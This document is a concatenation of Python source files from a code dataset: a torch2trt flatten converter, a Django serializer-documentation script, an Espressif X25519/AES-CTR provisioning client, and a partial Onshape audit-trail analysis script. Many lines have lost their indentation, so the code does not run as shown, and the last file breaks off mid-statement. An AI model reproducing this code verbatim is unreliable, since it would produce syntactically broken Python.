the-stack_0_6132 | from torch2trt.torch2trt import *
from torch2trt.module_test import add_module_test
from .identity import *
@tensorrt_converter('torch.Tensor.flatten')
@tensorrt_converter('torch.flatten')
def convert_flatten(ctx):
input = ctx.method_args[0]
start_dim = get_arg(ctx, 'start_dim', pos=1, default=0)
end_dim = get_arg(ctx, 'end_dim', pos=2, default=-1)
    if start_dim == -1:
        start_dim = len(input.shape) - 1
    if end_dim == -1:
        end_dim = len(input.shape) - 1
if start_dim == end_dim:
ctx.method_args = [input]
convert_identity(ctx)
return
input_trt = trt_(ctx.network, input)
shape_trt = ctx.network.add_shape(input_trt).get_output(0)
output = ctx.method_return
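    # Strategy: build the flattened shape at runtime from the input's dynamic shape tensor,
    # keeping the dims before start_dim and after end_dim, collapsing the middle dims into
    # their product, and then applying the result with a shuffle layer.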
shape1_trt = None
shape2_trt = None
if start_dim != 0:
slice1_start = [0]
slice1_size = [start_dim]
slice1_stride = [1]
shape1_trt = ctx.network.add_slice(shape_trt, slice1_start, slice1_size, slice1_stride).get_output(0)
if end_dim != len(input.shape)-1:
slice2_start = [end_dim+1]
slice2_size = [len(input.shape)-end_dim-1]
slice2_stride = [1]
shape2_trt = ctx.network.add_slice(shape_trt, slice2_start, slice2_size, slice2_stride).get_output(0)
slice_mid_start = [start_dim]
slice_mid_size = [end_dim-start_dim+1]
slice_mid_stride = [1]
shape_mid_trt = ctx.network.add_slice(shape_trt, slice_mid_start, slice_mid_size, slice_mid_stride).get_output(0)
# reduce mid
mid_trt = ctx.network.add_slice(shape_mid_trt, [0], [1], [1]).get_output(0)
for i in range(end_dim-start_dim):
other_trt = ctx.network.add_slice(shape_mid_trt, [i+1], [1], [1]).get_output(0)
mid_trt = ctx.network.add_elementwise(mid_trt, other_trt, trt.ElementWiseOperation.PROD).get_output(0)
# mid_trt = ctx.network.add_reduce(shape_mid_trt, trt.ReduceOperation.PROD, axes=1, keep_dims=True).get_output(0)
shape_mid_trt = mid_trt
    if shape1_trt is None:
new_shape_trt = ctx.network.add_concatenation([shape_mid_trt, shape2_trt]).get_output(0)
    elif shape2_trt is None:
new_shape_trt = ctx.network.add_concatenation([shape1_trt, shape_mid_trt]).get_output(0)
else:
new_shape_trt = ctx.network.add_concatenation([shape1_trt, shape_mid_trt, shape2_trt]).get_output(0)
layer = ctx.network.add_shuffle(input_trt)
layer.set_input(1, new_shape_trt)
output._trt = layer.get_output(0) |
the-stack_0_6137 | #!/usr/bin/env python3
import argparse
import inspect
import json
import os
import sys
from functools import partial
from importlib import import_module
from fan_tools.doc_utils.fan_sphinx.dyn_json import serializer_doc_info
from django.core.serializers.json import DjangoJSONEncoder
from rest_framework_dyn_serializer import DynModelSerializer
def compose(*funs):
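    # Composes the given callables right-to-left: the last one is called with the original
    # arguments to produce a generator, and every earlier callable is then applied to each
    # yielded item, flattening any nested generators along the way.
    # e.g. compose(get_dynserializers, get_modules)(['myapp']) yields every DynModelSerializer
    # subclass found in myapp.serializers / myapp.forms ('myapp' here is a hypothetical app label).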
it = funs[-1]
funs = funs[:-1]
def inner(*args, **kwargs):
for res in it(*args, **kwargs):
for fun in funs:
res = fun(res)
if inspect.isgenerator(res):
for r in res:
yield r
else:
yield res
return inner
def get_modules(apps):
for app in apps:
for mod in ('serializers', 'forms'):
try:
yield import_module('{}.{}'.format(app, mod))
except ImportError:
pass
except AttributeError:
pass
def get_dynserializers(module):
filters = (
lambda i: inspect.isclass(i),
lambda i: i != DynModelSerializer,
lambda i: not (hasattr(i, 'Meta') and getattr(i.Meta, 'abstract', False)),
lambda i: issubclass(i, DynModelSerializer) or getattr(i, '_write_docs', False),
)
for item in dir(module):
item = getattr(module, item)
if all(f(item) for f in filters):
yield item
class ArtifactWriter:
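    # Lightweight singleton that dumps serializer metadata as JSON files under DOCS_ROOT
    # (defaults to ./.doc); access it via ArtifactWriter.instance().
    # e.g. ArtifactWriter.instance().dump({'fields': []}, 'myapp.serializers.FooSerializer')
    # writes ./.doc/myapp.serializers.FooSerializer.json (names here are illustrative only).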
_inst = None
def __init__(self):
path = os.environ.get('DOCS_ROOT', './.doc')
if not os.path.exists(path):
os.mkdir(path)
self.doc_root = path
@classmethod
def instance(cls):
if not cls._inst:
cls._inst = cls()
return cls._inst
def dump(self, data, path):
f_name = os.path.join(self.doc_root, '{}.json'.format(path))
with open(f_name, 'w') as f:
json.dump(data, f, cls=DjangoJSONEncoder)
def container_type():
container = os.environ.get('CONTAINER_TYPE')
if not container:
sys.exit('Error: CONTAINER_TYPE is not defined')
return container
def process_item(item, flags):
path = '{}.{}'.format(item.__module__, item.__name__)
if flags.rst:
print('.. dyn_serializer:: {}/{}\n'.format(container_type(), path))
if flags.artifacts:
data = serializer_doc_info(item, path)
ArtifactWriter.instance().dump(data, path)
def process(apps, fun):
f = compose(get_dynserializers, get_modules)(apps)
for s in f:
fun(s)
parser = argparse.ArgumentParser(description='Parse serializers sources')
parser.add_argument('--rst', action='store_true', default=False, help='Output rst with serializers')
parser.add_argument(
'--artifacts', action='store_true', default=False, help='Write serializers artifacts'
)
def main():
sys.path.append('.')
args = parser.parse_args()
if not any((args.rst, args.artifacts)):
parser.print_help()
import django
django.setup()
from django.apps import apps
all_apps = (app.module.__name__ for app in apps.get_app_configs())
process(all_apps, partial(process_item, flags=args))
if __name__ == '__main__':
main()
|
the-stack_0_6138 | # Copyright 2018 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import utils
import proto
from .security import *
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey, X25519PublicKey
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
import session_pb2
class security_state:
REQUEST1 = 0
RESPONSE1_REQUEST2 = 1
RESPONSE2 = 2
FINISHED = 3
class Security1(Security):
def __init__(self, pop, verbose):
self.session_state = security_state.REQUEST1
self.pop = utils.str_to_bytes(pop)
self.verbose = verbose
Security.__init__(self, self.security1_session)
def security1_session(self, response_data):
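        # Three-step handshake state machine: send SessionCmd0 with our X25519 public key,
        # derive the AES-CTR session cipher from the device's response (the shared secret is
        # XORed with a SHA-256 of the proof-of-possession when one is set), then exchange
        # the verification messages in step 1.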
if (self.session_state == security_state.REQUEST1):
self.session_state = security_state.RESPONSE1_REQUEST2
return self.setup0_request()
if (self.session_state == security_state.RESPONSE1_REQUEST2):
self.session_state = security_state.RESPONSE2
self.setup0_response(response_data)
return self.setup1_request()
if (self.session_state == security_state.RESPONSE2):
self.session_state = security_state.FINISHED
self.setup1_response(response_data)
return None
else:
print("Unexpected state")
return None
def __generate_key(self):
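        # Generate an ephemeral Curve25519 (X25519) key pair for this provisioning session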
self.client_private_key = X25519PrivateKey.generate()
self.client_public_key = self.client_private_key.public_key()
def _print_verbose(self, data):
if (self.verbose):
print("++++ " + data + " ++++")
def setup0_request(self):
setup_req = session_pb2.SessionData()
setup_req.sec_ver = session_pb2.SecScheme1
self.__generate_key()
setup_req.sec1.sc0.client_pubkey = self.client_public_key.public_bytes()
self._print_verbose("Client Public Key:\t" + utils.bytes_to_hexstr(setup_req.sec1.sc0.client_pubkey))
return setup_req.SerializeToString()
def setup0_response(self, response_data):
setup_resp = proto.session_pb2.SessionData()
setup_resp.ParseFromString(utils.bytearr_to_bytes(response_data))
self._print_verbose("Security version:\t" + str(setup_resp.sec_ver))
if setup_resp.sec_ver != session_pb2.SecScheme1:
print("Incorrect sec scheme")
exit(1)
self._print_verbose("Device Public Key:\t" + utils.bytes_to_hexstr(setup_resp.sec1.sr0.device_pubkey))
self._print_verbose("Device Random:\t" + utils.bytes_to_hexstr(setup_resp.sec1.sr0.device_random))
sharedK = self.client_private_key.exchange(X25519PublicKey.from_public_bytes(setup_resp.sec1.sr0.device_pubkey))
self._print_verbose("Shared Key:\t" + utils.bytes_to_hexstr(sharedK))
if len(self.pop) > 0:
h = hashes.Hash(hashes.SHA256(), backend=default_backend())
h.update(self.pop)
digest = h.finalize()
sharedK = utils.xor(sharedK, digest)
self._print_verbose("New Shared Key XORed with PoP:\t" + utils.bytes_to_hexstr(sharedK))
self._print_verbose("IV " + hex(int(utils.bytes_to_hexstr(setup_resp.sec1.sr0.device_random), 16)))
cipher = Cipher(algorithms.AES(sharedK), modes.CTR(setup_resp.sec1.sr0.device_random), backend=default_backend())
self.cipher = cipher.encryptor()
self.client_verify = self.cipher.update(setup_resp.sec1.sr0.device_pubkey)
self._print_verbose("Client Verify:\t" + utils.bytes_to_hexstr(self.client_verify))
def setup1_request(self):
setup_req = proto.session_pb2.SessionData()
setup_req.sec_ver = session_pb2.SecScheme1
setup_req.sec1.msg = proto.sec1_pb2.Session_Command1
setup_req.sec1.sc1.client_verify_data = self.client_verify
return setup_req.SerializeToString()
def setup1_response(self, response_data):
setup_resp = proto.session_pb2.SessionData()
setup_resp.ParseFromString(utils.bytearr_to_bytes(response_data))
if setup_resp.sec_ver == session_pb2.SecScheme1:
self._print_verbose("Device verify:\t" + utils.bytes_to_hexstr(setup_resp.sec1.sr1.device_verify_data))
enc_client_pubkey = self.cipher.update(setup_resp.sec1.sr1.device_verify_data)
self._print_verbose("Enc client pubkey:\t " + utils.bytes_to_hexstr(enc_client_pubkey))
else:
print("Unsupported security protocol")
return -1
def encrypt_data(self, data):
return self.cipher.update(data)
def decrypt_data(self, data):
return self.cipher.update(utils.bytearr_to_bytes(data))
|
the-stack_0_6140 | import csv
import os
import sys
import datetime
import matplotlib.pyplot as plt
import numpy as np
import json
import copy
sys.path.append("API_Related_Files")
#import API_Related_Files.API_Call_Methods
"""
The default data format for audit trails is:
[index, event time, document, tab, user, description, feature reference, notes]
Process to download audit trails from Onshape
Tip:
- Download as an excel file from Onshape, make any necessary edits to the audit trail (cleaning up, deleting/fixing entries, etc) then save as csv file before running analysis on it. Excel sometimes defaults to stripping the seconds off of the event time entries when saving as csv depending on your system time format settings.
We can use datetime to convert the "event time" column strings to datetime objects:
datetime.datetime.strptime(row[1], "%Y-%m-%d %H:%M:%S")
Current limitations:
- currently searching only one entry forward and backward of "insert feature" and "Edit : XXX" entries for
"add or modify a sketch" to determine whether the feature inserted/edited was a sketch. This looks like it may catch
the vast majority of cases but is still not foolproof. Searching 2 forward/back might introduce other unwanted problems though
- currently lumping time spent on edits with no changes (clicked into edit something then clicked green checkmark without having made any actual changes) together with cancelledEditTime
Key assumptions:
- assumes first entry (bottom of csv) is "open document", which marks the beginning of the task
- assumes last entry (top of csv) is "closed document", marking the end of the task
(Currently this requires manually editing the csv file once downloaded from Onshape)
"""
def read_file(fileName) -> None:
"""
This function reads audit trails data and performs basic audit trail integrity checks.
    Currently, it checks that the indices are in order and that each date and time matches the expected format,
then creates a cleaned version and outputs that as a separate file
"""
# To store all data in the audit trail csv file
orig_data = []
# Builds the filepath by appending the file name to the current work directory
# The raw participant audit trails should be stored in a subfolder called "Participant_audit_trails"
filePathName = os.path.join(os.getcwd(), "Participant_audit_trails", fileName)
# print("Opening file: " + filePathName)
# Open csv file and copy all rows into "orig_data"
with open(filePathName, 'r') as csv_file:
data_reader = csv.reader(csv_file)
for row in data_reader:
orig_data.append(row)
# Check that index column starts at 1 and doesn't skip any numbers
if str(orig_data[1][0]) != "1":
print("Index does not start with 1!")
return -1
# Next, check if index is in order starting from 1
totalEntries = len(orig_data) - 1
# Note: we're doing 1 less than len(orig_data) to not count the top row as an entry since that's the column header
for index in range(1, totalEntries):
# print("Checking index: " + str(index) + " dataset index: " + str(orig_data[index][0]))
if str(orig_data[index][0]) != str(index):
print("Index not in order!")
print("Expected index " + str(index) + " Dataset index " + str(orig_data[index][0]))
return -1
else:
pass
# Optional:
# print("INFO: Original input file indices check out")
# print("INFO: Number of entries in dataset: " + str(totalEntries))
# call function to clean the csv
cleanCsv(fileName, orig_data)
return None
def cleanCsv(fileName, orig_data):
"""
Clean CSV file to get rid of useless entries
Entries that get deleted:
- "Update Part Metadata"
- "Commit add or edit of part studio feature"
Purposefully NOT removing "Add or modify a sketch" entries since we'll be using those to identify if an inserted/edited
feature was a sketch or not during analysis (hopefully this will not be necessary in the future if Onshape updates the
audit trails)
"""
# First, create the "filename_cleaned" string, the [:-4] gets rid of the ".csv" part,
# slotting "_cleaned" before the .csv part. We will save a separate "cleaned" audit trail as output
cleanedFileName = fileName[:-4] + "_cleaned" + fileName[-4:]
#print("Output file name= " + cleanedFileName)
#parentDirectory = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
#outFilePath = os.path.join(parentDirectory, "Participant_audit_trails", cleanedFileName)
outFilePath = os.path.join(os.getcwd(), "Participant_audit_trails", cleanedFileName)
#print("Output file path: ", outFilePath)
# if lines don't contain "commit add" or "metadata" then write the row into the output csv
# at the same time checks each row to make sure time format is as expected
with open(outFilePath, "w", newline="") as out_file:
writer = csv.writer(out_file)
goodEntries = 0
# for loop iteration index to be able to display which entry failed the time format check
for index, row in enumerate(orig_data):
if "Commit add or edit" in row[5] or "Update Part Metadata" in row[5] or "Delete part studio feature" in row[5]:
pass
else:
# if not those above, then make a copy of this row, re-index, then write to output
# also re-index while writing the rows, top row (row 0) should say "Index"
rowCopy = copy.copy(row)
rowCopy[0]=goodEntries
if goodEntries == 0:
rowCopy[0] = "Index"
writer.writerow(rowCopy)
goodEntries += 1
if index == 0:
# first row is the text "Index" so don't check for this row
pass
else:
try:
row[1] = datetime.datetime.strptime(row[1], "%Y-%m-%d %H:%M:%S")
except ValueError:
print("Issue with with date time entry at index: " + str(index))
pass
#print(row[1], " type: ", type(row[1]))
#print("INFO: Number of entries after scrubbing: " + str(goodEntries-1))
# now run the analyze function on the cleaned csv that's just been saved
analyzeAuditTrail(cleanedFileName)
return None
def timeConverter(totalTime):
    ### This function takes in a timedelta object, converts it into a number of seconds,
    ### then into minutes and seconds using divmod, and finally turns the output into
    ### integers, then strings, for easier printing (avoids fiddling with floating point formatting during print)
minSec = divmod(totalTime.total_seconds(), 60)
    # divmod returns a tuple of 2 floats (minutes, seconds); converting them to integers
minutes = str(int(minSec[0]))
seconds = str(int(minSec[1]))
return [minutes,seconds]
def analyzeAuditTrail(fileName):
"""
Function to identify the relevant feature for each audit trail entry based on the description
    Args:
        fileName: name of the cleaned audit trail csv file (including the .csv extension)
    Returns:
        None
"""
#fileName += ".csv"
# current directory is "API_Rel._Files", need to step one directory up first
# os.pardir adds the ".." to the end of the current wd, then abspath fines the actual path of the parent dir
#parentDirectory = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
# stepping into the participant audit trails folder, tacking on file name, with .csv tacked on already
#filePathName = os.path.join(parentDirectory, "Participant_audit_trails", fileName)
# updated file path with main python file at the root of the project folder
filePathName = os.path.join(os.getcwd(), "Participant_audit_trails", fileName)
#print("fileName: " + fileName)
#print("filePathName: " + filePathName)
#print("Opening file: " + filePathName)
data = [] # to store cleaned audit trail data
# load in data (should be the cleaned .csv)
with open(filePathName, 'r') as csv_file:
data_reader = csv.reader(csv_file)
for row in data_reader:
data.append(row)
fileName = fileName.removesuffix(".csv") # fileName = XX_IDXX_cleaned.csv
insertFeatureIndices = []
editFeatureIndices = []
skippedFeatures = []
sketchesCreatedNames = []
# intialize counters (counts instances)
sketchesCreated = featuresCreated = sketchesEdited = featuresEdited = switchedToDrawing = 0
# need to initialize the time counters to 0 seconds first
sketchCreateTime = featureCreateTime = sketchEditTime = featureEditTime = \
readDrawingTime = partstudioTime = datetime.timedelta(seconds=0)
cancelledCreateTime = cancelledEditTime = datetime.timedelta(seconds=0)
# the following counters are operations with no start/end times (noTimeDelta features)
movedFeature = movedRollbackBar = operationsCancelled = undoRedo = createFolder = \
renameFeature = showHide = deletedFeature = 0
# Global variable for controlling how long actions without start & end times should be recorded as (how many seconds)
noTimeDeltaFeatures = 1 #seconds
# these features are: operationsCancelled, movedRollbackBar, movedFeature, undoRedo, createFolder, renameFeature, showHide
# list for hidden markov model building
HMMList = []
HMMList_StartEnd = []
########################
# time_series array will be used to build the sequential list of actions
time_series = []
"""
Each element in the time_series array has the format:
(action type, start time of the action, time duration)
E.g. ("sketch", datetime(00:05:15), datetime(00:00:20))
= did sketching starting at 5 min 15 sec for 20 seconds
    All action_type values appended below:
    sketchCreateTime, featureCreateTime, sketchEditTime, featureEditTime (each with a " - <feature name>" suffix),
    readDrawingTime (with a " - <drawing name>" suffix), partstudioTime, cancelledCreateTime, cancelledEditTime,
    moveRollbackBar, moveFeature, undoRedo, createFolder, renameFeature, showHide, deletedFeature
"""
########################
# Convert every entry in the event time column from a string into a datetime object
# Also clear feature reference column (6) in case the file being read already has some existing data
for row in data[1:]: # skip top row since it's just labels
#print(str(len(row)))
row[1] = datetime.datetime.strptime(row[1], "%Y-%m-%d %H:%M:%S")
# the 7th and 8th column might be empty, if so, append a blank entry
try:
row[6] = ""
#print("old row len =" + str(len(row)))
except IndexError:
row.append("")
try:
row[7] = ""
except IndexError:
row.append("")
#print("new row len =" + str(len(row)))
# Dealing with the top header row
# Sometimes the header row will be missing entries, so checking for the proper length, if not, then append as needed
#print(data[0])
if len(data[0]) == 6:
#print("Len is 6")
data[0].append("")
data[0].append("")
    elif len(data[0]) == 7:
#print("Len is 7")
data[0].append("")
# then rename row 7 and 8 with proper names
data[0][6] = "Feature Reference"
data[0][7] = "HMM Sequence"
#print(data[0])
# start range() at 1 to skip the top row, then reverse it to start from the bottom of the csv file
for i in reversed(range(1,len(data))):
#print("Currently on index: " + str(i))
# for adding part studio features (sketches/all other feature)
if data[i][5] == "Add part studio feature":
#print("Found add part studio feature at: " + str(i))
featureStartIndex = i
while True:
featureStartIndex -= 1
#print(featureStartIndex)
if "Insert feature" in data[featureStartIndex][5]:
#print("found Insert feature at index " + str(featureStartIndex))
if featureStartIndex in insertFeatureIndices:
# check to see if this insert feature has already been matched to another "add ps feature"
# if yes, then skip to find the next available
pass
else:
# if "add of modify a sketch" is before or after insert feature, that means the
# inserted feature was likely a sketch
if "Add or modify a sketch" in data[featureStartIndex + 1][5] or \
"Add or modify a sketch" in data[featureStartIndex - 1][5]:
#print("Added sketch at: " + str(featureStartIndex))
featureName = data[featureStartIndex][5].split(" : ")[1] + " (Sketch)"
data[featureStartIndex][6] = featureName
data[i][6] = featureName
data[featureStartIndex][7] = "End Create"
data[i][7] = "Start Create"
# add this to the running list of discovered insert feature indices
insertFeatureIndices.append(featureStartIndex)
# calculate time spent creating a new sketch
sketchCreateTime += data[featureStartIndex][1] - data[i][1]
timeSeriesEntry = "sketchCreateTime - " + featureName
time_series.append((timeSeriesEntry, data[i][1] , (data[featureStartIndex][1] - data[i][1])))
sketchesCreated += 1
sketchesCreatedNames.append(featureName)
HMMList.append("Create")
break
else:
#print("Regular feature added at: " + str(featureStartIndex))
featureName = data[featureStartIndex][5].split(" : ")[1]
data[featureStartIndex][6] = featureName
data[i][6] = featureName
data[featureStartIndex][7] = "End Create"
data[i][7] = "Start Create"
# add this to the running list of discovered insert feature indices
insertFeatureIndices.append(featureStartIndex)
# calculate time spent creating a new feature
featureCreateTime += data[featureStartIndex][1] - data[i][1]
timeSeriesEntry = "featureCreateTime - " + featureName
time_series.append((timeSeriesEntry, data[i][1], (data[featureStartIndex][1] - data[i][1])))
featuresCreated += 1
HMMList.append("Create")
break
if "Cancel Operation" in data[featureStartIndex][5]:
#print("Operation cancelled at: " + str(featureStartIndex))
featureName = "Cancelled add feature"
data[featureStartIndex][6] = featureName
data[i][6] = featureName
#data[featureStartIndex][7] = "End Create"
#data[i][7] = "Start Create"
# calculate time spent on a cancelled new feature creation
cancelledCreateTime += data[featureStartIndex][1] - data[i][1]
time_series.append(("cancelCreateTime", data[i][1], (data[featureStartIndex][1] - data[i][1])))
operationsCancelled += 1
#HMMList.append("Create")
break
# for editing of part studio features (sketches/all other feature)
elif data[i][5] == "Start edit of part studio feature":
#print("Found edit of part studio feature at: " + str(i))
featureStartIndex = i
HMMList.append("Revise")
while True:
featureStartIndex -= 1
if "Edit :" in data[featureStartIndex][5]:
#print("found Edit at index " + str(featureStartIndex))
if featureStartIndex in editFeatureIndices:
# check to see if this insert feature has already been matched to another "edit ps feature"
# if yes, then skip to find the next available
pass
else:
if "Add or modify a sketch" in data[featureStartIndex + 1][5] or \
"Add or modify a sketch" in data[featureStartIndex - 1][5]:
#print("Edited (Add or modify) sketch at: " + str(featureStartIndex))
featureName = data[featureStartIndex][5].split(" : ")[1] + " (Sketch)"
data[featureStartIndex][6] = featureName
data[i][6] = featureName
data[featureStartIndex][7] = "End Edit"
data[i][7] = "Start Edit"
# add this to the running list of discovered edit feature indices
editFeatureIndices.append(featureStartIndex)
# calculate time spent editing a sketch
sketchEditTime += data[featureStartIndex][1] - data[i][1]
timeSeriesEntry = "sketchEditTime - " + featureName
time_series.append((timeSeriesEntry, data[i][1] , (data[featureStartIndex][1] - data[i][1])))
sketchesEdited += 1
break
else:
#print("Regular feature edit at: " + str(featureStartIndex))
featureName = data[featureStartIndex][5].split(" : ")[1]
data[featureStartIndex][6] = featureName
data[i][6] = featureName
data[featureStartIndex][7] = "End Edit"
data[i][7] = "Start Edit"
# add this to the running list of discovered edit feature indices
editFeatureIndices.append(featureStartIndex)
# calculate time spent editing a feature
featureEditTime += data[featureStartIndex][1] - data[i][1]
timeSeriesEntry = "featureEditTime - " + featureName
time_series.append((timeSeriesEntry, data[i][1] , (data[featureStartIndex][1] - data[i][1])))
featuresEdited += 1
break
# if the next thing following "start edit" is "add or modify a sketch" without an "Edit : ", then
# that means the user clicked the green checkmark without making any actual changes to a sketch
elif "Add or modify a sketch" in data[featureStartIndex][5]:
# sometimes the "edit" entry can come after the "add or modify a sketch" entry, so we still need to
# check to make sure the entry above isn't an feature edit commit
# if it is, then this there were in fact modifications done to a sketch feature
if "Edit" in data[featureStartIndex - 1][5]:
featureName = data[featureStartIndex-1][5].split(" : ")[1] + " (Sketch)"
data[featureStartIndex-1][6] = featureName
data[i][6] = featureName
data[featureStartIndex-1][7] = "End Edit"
data[i][7] = "Start Edit"
# add this to the running list of discovered edit feature indices
editFeatureIndices.append(featureStartIndex)
# calculate time spent editing a sketch
sketchEditTime += data[featureStartIndex-1][1] - data[i][1]
timeSeriesEntry = "sketchEditTime - " + featureName
time_series.append((timeSeriesEntry, data[i][1], (data[featureStartIndex-1][1] - data[i][1])))
sketchesEdited += 1
break
else:
# if "edit" wasn't found in the entry above, then this was likely a edit with no real changes
featureName = "No change edit to a sketch feature"
data[featureStartIndex][6] = featureName
data[i][6] = featureName
data[featureStartIndex][7] = "End Edit"
data[i][7] = "Start Edit"
# add this to the running list of discovered edit feature indices
editFeatureIndices.append(featureStartIndex)
# counting this time as same as cancelledEditTime, lumping them together
cancelledEditTime += data[featureStartIndex][1] - data[i][1]
time_series.append(("cancelledEditTime", data[i][1], (data[featureStartIndex][1] - data[i][1])))
operationsCancelled += 1
break
# if another "start edit" or "add part studio feature" is encountered before finding an "edit :", then
# the user likely started editing a feature, but didn't actually make a change before clicking the green checkmark
# essentially leaving two "start edit part studio feature" entries back to back
                # similar situation to the no-change edit situation for sketches, but in this case there's no entry at all
elif "Start edit of part studio feature" in data[featureStartIndex][5] or \
"Add part studio feature" in data[featureStartIndex][5]:
#print("NO CHANGE FEATURE EDIT AT INDEX: " + str(featureStartIndex))
featureName = "No change edit to a feature"
# only mark the i-th (start) entry with featureName, since there's no ending entry in audit trail
data[i][6] = featureName
# add this to the running list of discovered edit feature indices
editFeatureIndices.append(featureStartIndex)
# counting these as zeroDelta times since there's no way to determine for sure how long they spent on these
cancelledEditTime += datetime.timedelta(seconds=noTimeDeltaFeatures)
time_series.append(("cancelledEditTime", data[i][1], datetime.timedelta(seconds=noTimeDeltaFeatures)))
operationsCancelled += 1
break
elif "Cancel Operation" in data[featureStartIndex][5]:
#print("Edit operation cancelled at: " + str(featureStartIndex))
featureName = "Cancelled edit feature"
data[featureStartIndex][6] = featureName
data[i][6] = featureName
data[featureStartIndex][7] = "End Edit"
data[i][7] = "Start Edit"
# calculate time spent on a cancelled new feature creation
cancelledEditTime += data[featureStartIndex][1] - data[i][1]
time_series.append(("cancelledEditTime", data[i][1], (data[featureStartIndex][1] - data[i][1])))
operationsCancelled += 1
break
# tracking opening and closing drawings
elif "BLOB opened" in data[i][5]:
currentDrawing = data[i][3]
# search ahead for when this drawing was closed
featureStartIndex = i
HMMList.append("Drawing")
while True:
featureStartIndex -= 1
# finds the next "BLOB closed"
if "BLOB closed" in data[featureStartIndex][5]:
# check and see if this "BLOB closed" matches the current drawing
if data[featureStartIndex][3] == currentDrawing:
data[featureStartIndex][6] = currentDrawing + "(closed)"
data[i][6] = currentDrawing + "(opened)"
#data[featureStartIndex][7] = "Close Drawing"
data[i][7] = "Refer to Drawing"
# calculate time spent reading a drawing
readDrawingTime += data[featureStartIndex][1] - data[i][1]
timeSeriesEntry = "readDrawingTime - " + currentDrawing
time_series.append((timeSeriesEntry, data[i][1], (data[featureStartIndex][1] - data[i][1])))
switchedToDrawing += 1
break
else:
pass
else:
pass
# tracking opening and closing partstudios
elif "PARTSTUDIO opened" in data[i][5]:
currentPS = data[i][3]
# search ahead for when this partstudio was closed
featureStartIndex = i
#print("partstudio open, index: " + str(i))
while True:
featureStartIndex -= 1
# finds the next "BLOB closed"
if "PARTSTUDIO closed" in data[featureStartIndex][5]:
# check and see if this part studio matches the current part studio
# not actually necessary in my dataset since there's only one partstudio
#if data[featureStartIndex][3] == currentPS:
data[featureStartIndex][6] = currentPS + "(closed)"
data[i][6] = currentPS + "(opened)"
# calculate time spent inside partstudios (this will overlap with feature creation and edit times)
partstudioTime += data[featureStartIndex][1] - data[i][1]
time_series.append(("partstudioTime", data[i][1], (data[featureStartIndex][1] - data[i][1])))
# no need to track times switched to partstudio since it should be the same as times switched to drawing
#print("closed: " + str(featureStartIndex))
break
if featureStartIndex == 1:
print("ERROR: Partstudio closed not found! Start index: " + str(i))
break
# tracking moving features or rollback bar
elif "Move" in data[i][5]:
if "Rollback bar" in data[i][5]:
data[i][6] = "-- move rollbackbar +1 --"
time_series.append(("moveRollbackBar", data[i][1], datetime.timedelta(seconds=noTimeDeltaFeatures)))
movedRollbackBar += 1
#HMMList.append("Revise")
#data[i][7] = "Revise"
elif "tab" in data[i][5]:
# moved a tab, not a feature
data[i][6] = "-- moved tab, ignore --"
else:
data[i][6] = "-- move feature +1 --"
time_series.append(("moveFeature", data[i][1], datetime.timedelta(seconds=noTimeDeltaFeatures)))
movedFeature += 1
HMMList.append("Organize")
data[i][7] = "Organize"
# tracking undo/redo
elif "Undo Redo" in data[i][5]:
# if the undo/redo was done during sketching, the only etry will be "Undo Redo Operation"
# if the undo/redo is done in partstudio, then there will be one more entry "Undo : 1 step"
# need to check for this
#print("Checking undo (or redo) steps, this one's description is : " + data[i][5])
# the "Undo : " entry can come before or after "Undo Redo Operation"
if "Undo : " in data[i-1][5]:
data[i-1][6] = "-- Feature undoRedo +1 --"
data[i][6] = "-- Feature undoRedo --"
elif "Undo : " in data[i+1][5]:
data[i+1][6] = "-- Feature undoRedo +1 --"
data[i][6] = "-- Feature undoRedo --"
elif "Redo : " in data[i-1][5]:
data[i + 1][6] = "-- Feature undoRedo +1 --"
data[i][6] = "-- Feature undoRedo --"
elif "Redo : " in data[i+1][5]:
data[i + 1][6] = "-- Feature undoRedo +1 --"
data[i][6] = "-- Feature undoRedo --"
else:
data[i][6] = "-- Sketch undoRedo +1 --"
time_series.append(("undoRedo", data[i][1], datetime.timedelta(seconds=noTimeDeltaFeatures)))
HMMList.append("Revise")
#data[i][7] = "Revise"
# currently grouping all undoRedo together, not separately tracking them
undoRedo += 1
# create folder
elif "Create folder" in data[i][5]:
data[i][6] = "New folder: " + data[i][5].split(" : ")[1]
time_series.append(("createFolder", data[i][1], datetime.timedelta(seconds=noTimeDeltaFeatures)))
createFolder += 1
HMMList.append("Organize")
data[i][7] = "Organize"
#featureName = data[featureStartIndex-1][5].split(" : ")[1] + " (Sketch)"
elif "Rename" in data[i][5]:
data[i][6] = "-- renameFeature +1 --"
time_series.append(("renameFeature", data[i][1], datetime.timedelta(seconds=noTimeDeltaFeatures)))
renameFeature += 1
HMMList.append("Organize")
data[i][7] = "Organize"
elif "Show" in data[i][5] or "Hide" in data[i][5]:
data[i][6] = "-- showHide +1 --"
time_series.append(("showHide", data[i][1], datetime.timedelta(seconds=noTimeDeltaFeatures)))
showHide += 1
elif "Add or modify a sketch" in data[i][5]:
# these entries are already accounted for above, just marking them so they're not blank in the output
#data[i][6] = "-- add/mod. sketch (accounted for) --"
data[i][6] = "---"
elif "Delete" in data[i][5]:
featureName = data[i][5].split(" : ")[1]
data[i][6] = "deleted " + featureName
time_series.append(("deletedFeature", data[i][1], datetime.timedelta(seconds=noTimeDeltaFeatures)))
deletedFeature += 1
HMMList.append("Delete")
data[i][7] = "Delete"
elif "Close document" in data[i][5]:
if data[i][0] != str(1):
print(data[i])
print("Error! Close document is not the last entry!")
return -1
else:
pass
#endTime = datetime.datetime.strptime(data[i][1])
elif "Open document" in data[i][5]:
#startTime = datetime.datetime.strptime(data[i][1])
if data[i][0] != str(len(data)-1): # -1 to account for top row not being a valid entry
print("Error! Open document is not the first entry!")
# a list of things that I don't want to be accidentally marked as skipped, they're all accounted for in sub-routines of
# other higher level elif checks
elif "Edit" in data[i][5] or \
"Insert feature" in data[i][5] or \
"Cancel Operation" in data[i][5] or \
"Create Version" in data[i][5] or \
